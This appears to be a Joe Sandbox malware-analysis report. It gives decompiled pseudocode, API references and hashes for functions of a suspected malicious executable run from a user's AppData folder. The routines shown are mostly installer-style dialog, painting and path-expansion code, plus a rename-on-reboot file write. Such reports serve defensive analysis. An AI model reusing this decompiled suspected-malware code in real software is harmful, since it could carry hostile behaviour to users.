						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}

0x00404795
0x004048c2
0x0040491f
0x00404923
0x004049f0
0x004049f2
0x004049f2
0x004049f8
0x004049f8
0x004049fb
0x00000000
0x00404a02
0x00404931
0x00404937
0x00404941
0x0040494c
0x0040494f
0x00404952
0x0040495d
0x00404960
0x00404967
0x00404974
0x00404985
0x0040498b
0x00404993
0x004049a1
0x004049a7
0x004049a7
0x00404967
0x004049b1
0x00000000
0x004049bc
0x004049c0
0x004049d0
0x004049d0
0x004049d6
0x004049e2
0x004049e2
0x00000000
0x004049e6
0x004049b1
0x004048cd
0x00000000
0x004048df
0x004048e4
0x004048ea
0x00000000
0x00000000
0x00404913
0x00404915
0x0040491a
0x00000000
0x0040491a
0x004048cd
0x0040479b
0x0040479e
0x004047a3
0x004047b4
0x004047b4
0x004047bc
0x004047bf
0x004047c3
0x004047c6
0x004047ca
0x004047cd
0x004047d0
0x004047d3
0x004047da
0x004047dc
0x004047dc
0x004047e6
0x004047f3
0x004047fd
0x00404802
0x00404805
0x0040480a
0x00404821
0x00404828
0x0040483b
0x0040483e
0x00404852
0x00404859
0x0040485e
0x00404863
0x00404863
0x00404871
0x0040487f
0x00404891
0x00404896
0x004048a6
0x004048a8
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
GetDlgItem.USER32(?,000003E8), ref: 00404835
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
GetSysColor.USER32 ref: 00404863
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
lstrlenW.KERNEL32(?), ref: 00404884
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
GetDlgItem.USER32(?,0000040A), ref: 004048FF
SendMessageW.USER32(00000000), ref: 00404906
GetDlgItem.USER32(?,000003E8), ref: 00404931
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
LoadCursorW.USER32 ref: 00404982
SetCursor.USER32(00000000), ref: 00404985
LoadCursorW.USER32 ref: 0040499E
SetCursor.USER32(00000000), ref: 004049A1
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2

Strings

Call, xrefs: 00404960
N, xrefs: 0040491F

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x004062ae
0x004062b7
0x004062be
0x004062c8
0x004062dc
0x00406304
0x0040630b
0x0040630f
0x00406313
0x00406333
0x0040633a
0x00406344
0x00406351
0x00406356
0x0040635b
0x0040635f
0x0040636e
0x00406370
0x0040637d
0x00406381
0x0040641c
0x00000000
0x00406397
0x004063a4
0x004063c8
0x004063cc
0x004063eb
0x004063ef
0x004063ef
0x004063f1
0x004063fa
0x00406405
0x00406410
0x00406416
0x00000000
0x00406416
0x004063ce
0x004063d1
0x004063dc
0x004063d8
0x004063da
0x004063db
0x004063db
0x004063e3
0x004063e5
0x00000000
0x004063e5
0x004063af
0x004063b5
0x00000000
0x004063b5
0x00406381
0x0040635f
0x004062de
0x004062e9
0x004062f2
0x004062f6
0x00000000
0x00000000
0x004062f6
0x00406427

APIs

CloseHandle.KERNEL32(00000000), ref: 004062E9
GetShortPathNameW.KERNEL32 ref: 004062F2

Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

GetShortPathNameW.KERNEL32 ref: 0040630F
wsprintfA.USER32 ref: 0040632D
GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
GlobalFree.KERNEL32(00000000), ref: 00406416
CloseHandle.KERNEL32(00000000), ref: 0040641D

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\venxajlddf.exe,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Strings

uB, xrefs: 00406304
mB, xrefs: 004062D7
%ls=%ls, xrefs: 00406323
[Rename], xrefs: 00406397, 004063A9
uB, xrefs: 0040630B

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$mB$uB$uB
API String ID: 2171350718-2295842750
Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x400);
							goto L26;
						} else {
							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x004066a5
0x004066a5
0x004066a5
0x004066ab
0x004066b0
0x004066c1
0x004066c1
0x004066c9
0x004066ca
0x004066cb
0x004066cc
0x004066cf
0x004066d7
0x004066d9
0x004066ea
0x004066ed
0x004066ed
0x004066f1
0x004066f7
0x004066fa
0x004068d5
0x004068d5
0x004068e0
0x004068ec
0x004068ec
0x00000000
0x00406700
0x00406705
0x0040671a
0x0040671b
0x00406721
0x004068b3
0x004068c1
0x004068c4
0x004068c4
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068bd
0x004068c6
0x004068c6
0x004068cc
0x004068cf
0x00406702
0x00000000
0x00406702
0x00000000
0x004068cf
0x00406727
0x0040672a
0x00406739
0x00406740
0x0040674c
0x0040674f
0x00406752
0x00406753
0x00406758
0x0040675e
0x00406761
0x00406764
0x00406857
0x0040685c
0x0040688f
0x00406894
0x00406899
0x0040689e
0x0040689e
0x004068a3
0x004068a9
0x004068ac
0x00000000
0x004068ac
0x0040685e
0x00406861
0x00406864
0x00406879
0x00406880
0x00406866
0x0040686d
0x0040686d
0x00406888
0x0040688b
0x0040684f
0x00406850
0x00406850
0x00000000
0x0040688b
0x00406771
0x00406775
0x00406775
0x00406776
0x00406778
0x004067b5
0x004067b8
0x004067c8
0x004067cb
0x004067d3
0x004067d9
0x004067d9
0x00406834
0x00406834
0x00406836
0x00000000
0x00000000
0x004067dd
0x004067e2
0x004067e3
0x004067e5
0x004067fc
0x0040680a
0x00406810
0x00406812
0x00406830
0x00406830
0x00406830
0x00000000
0x00406830
0x00406818
0x00406821
0x00406824
0x0040682a
0x0040682e
0x00000000
0x00000000
0x00000000
0x0040682e
0x004067f6
0x004067f8
0x004067fa
0x00000000
0x00000000
0x00000000
0x004067fa
0x00000000
0x00406834
0x004067c0
0x00000000
0x0040677a
0x00406798
0x004067a1
0x0040683e
0x00406842
0x0040684a
0x0040684a
0x00000000
0x00406842
0x004067ab
0x00406838
0x0040683c
0x00000000
0x00000000
0x00000000
0x0040683c
0x00406778
0x00000000
0x00406705

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004067C0
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
lstrcatW.KERNEL32 ref: 0040684A
lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

Strings

Call, xrefs: 004066CF, 00406782, 00406789, 0040678D, 004067AA, 004067BF, 004067D2, 004067E7, 00406814, 00406849, 0040684F, 0040686C, 0040687F, 0040689D, 004068A3, 004068AC, 004068E2
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E

Memory Dump Source

Source File: 00000004.00000002.1180457129.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1180453513.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180462662.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180466472.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180479878.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180487735.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180496022.0000000000459000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180520942.000000000045B000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1180531476.000000000046B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_venxajlddf.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-1230650788
Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040462B Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040462B(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x0040463d
0x004046f3
0x00000000
0x004046f3
0x0040464e
0x00404652
0x00000000
0x0040466c
0x0040466c
0x00404675
0x00000000
0x00000000
0x00404677
0x00404683
0x00404686
0x00404686
0x0040468c
0x00404692
0x00404692
0x0040469e
0x004046a4
0x004046ab
0x004046ae
0x004046b1
0x004046b3
